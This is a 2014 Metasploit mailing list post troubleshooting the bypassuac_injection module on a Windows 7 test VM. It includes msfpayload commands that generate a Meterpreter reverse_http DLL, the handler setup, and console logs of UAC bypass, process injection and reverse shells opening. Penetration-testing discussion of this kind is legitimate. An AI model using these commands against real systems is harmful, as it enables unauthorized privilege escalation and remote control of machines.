Metasploit mailing list archives
Custom exe not working for bypassuac_injection
From: Who Few <whothefew () yahoo com>
Date: Sat, 10 May 2014 09:19:23 -0700 (PDT)
I have noticed some very odd behavior with the exploit/windows/local/bypassuac_injection module. On a test Win7 SP1 32bit VM, if I specify a custom exe, I get 2 shells and an error message on the client side. "Windows encountered an internal error while initializing COM libraries". I have tried many different combinations of settings and payloads and nothing works satisfactorily. If I do not set the custom exe variable, metasploit automatically generated shellcode works perfectly. Likewise if I capture the payload dll from the client machine and specify it as the custom exe it also works flawlessly. The only problem arises when I generate a payload dll using msfpayload. Here is a byte comparison of the automatically generated payload and the msfpayload generated payload both of which used the same default settings. root@Kali:~/uac/http# cmp -l http.dll CRYPTBASE.dll 1669 124 120 1670 150 162 1671 162 157 1672 145 143 1673 141 145 1674 144 163 1675 0 163 2301 116 147 2302 162 65 2303 126 107 2304 106 171 root@Kali:~/uac/http# msfpayload -p windows/meterpreter/reverse_http LHOST=192.168.1.120 LPORT=8080 D > http.dll Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_http Length: 331 Options: {"LHOST"=>"192.168.1.120", "LPORT"=>"8080"} The results of a test run for each dll: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http PAYLOAD => windows/meterpreter/reverse_http msf exploit(handler) > set LHOST 192.168.1.120 LHOST => 192.168.1.120 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set lport 8080 lport => 8080 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started HTTP reverse handler on http://0.0.0.0:8080/ [*] Starting the payload handler... [*] 192.168.1.135:52562 Request received for /y6gF... [*] 192.168.1.135:52562 Staging connection for target /y6gF received... [*] Patched user-agent at offset 663640... [*] Patched transport at offset 663304... [*] Patched URL at offset 663368... [*] Patched Expiration Timeout at offset 664240... [*] Patched Communication Timeout at offset 664244... [*] Meterpreter session 13 opened (192.168.1.120:8080 -> 192.168.1.135:52562) at 2014-05-08 12:54:51 -0700 msf exploit(handler) > use exploit/windows/local/bypassuac_injection msf exploit(bypassuac_injection) > set session 13 session => 13 msf exploit(bypassuac_injection) > set verbose true verbose => true msf exploit(bypassuac_injection) > set DisablePayloadHandler true DisablePayloadHandler => true msf exploit(bypassuac_injection) > set EXE::Custom /root/uac/http/http.dll EXE::Custom => /root/uac/http/http.dll msf exploit(bypassuac_injection) > exploit [*] UAC is Enabled, checking level.. [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Checking admin status... [+] Part of Administrators group! Continuing... [*] Using custom payload /root/uac/http/http.dll, RHOST and RPORT settings will be ignored! [*] Uploading the Payload DLL to the filesystem... [*] Payload DLL 5120 bytes long being uploaded.. [*] Spawning process with Windows Publisher Certificate, to inject into... [*] Injecting into process ID 1952 [*] Opening process 1952 [*] Executing payload [+] Successfully injected payload in to process: 1952 [*] 192.168.1.135:52851 Request received for /ChbO.. [*] 192.168.1.135:52851 Staging connection for target /ChbO received... [*] Patched user-agent at offset 663640... [*] Patched transport at offset 663304... [*] Patched URL at offset 663368... [*] Patched Expiration Timeout at offset 664240.. [*] Patched Communication Timeout at offset 664244... [*] Meterpreter session 14 opened (192.168.1.120:8080 -> 192.168.1.135:52851) at 2014-05-08 12:55:11 -0700 [*] 192.168.1.135:52853 Request received for /ChbO... [*] 192.168.1.135:52853 Staging connection for target /ChbO received.. [*] Patched user-agent at offset 663640... [*] Patched transport at offset 663304... [*] Patched URL at offset 663368... [*] Patched Expiration Timeout at offset 664240... [*] Patched Communication Timeout at offset 664244... [*] Meterpreter session 15 opened (192.168.1.120:8080 -> 192.168.1.135:52853) at 2014-05-08 12:55:11 -0700 [*] Cleaning up payload file... msf exploit(bypassuac_injection) > set EXE::Custom /root/uac/http/CRYPTBASE.dll EXE::Custom => /root/uac/http/CRYPTBASE.dll msf exploit(bypassuac_injection) > exploit [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Checking admin status... [+] Part of Administrators group! Continuing... [*] Using custom payload /root/uac/http/CRYPTBASE.dll, RHOST and RPORT settings will be ignored! [*] Uploading the Payload DLL to the filesystem... [*] Payload DLL 5120 bytes long being uploaded.. [*] Spawning process with Windows Publisher Certificate, to inject into.. [*] Injecting into process ID 2124 [*] Opening process 2124 [*] Executing payload [+] Successfully injected payload in to process: 2124 [*] Cleaning up payload file... [*] 192.168.1.135:53466 Request received for /g5Gy... [*] 192.168.1.135:53466 Staging connection for target /g5Gy received.. [*] Patched user-agent at offset 663640... [*] Patched transport at offset 663304... [*] Patched URL at offset 663368... [*] Patched Expiration Timeout at offset 664240... [*] Patched Communication Timeout at offset 664244.. [*] Meterpreter session 16 opened (192.168.1.120:8080 -> 192.168.1.135:53466) at 2014-05-08 13:03:04 -0700 msf exploit(bypassuac_injection) > _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Custom exe not working for bypassuac_injection Who Few (May 10)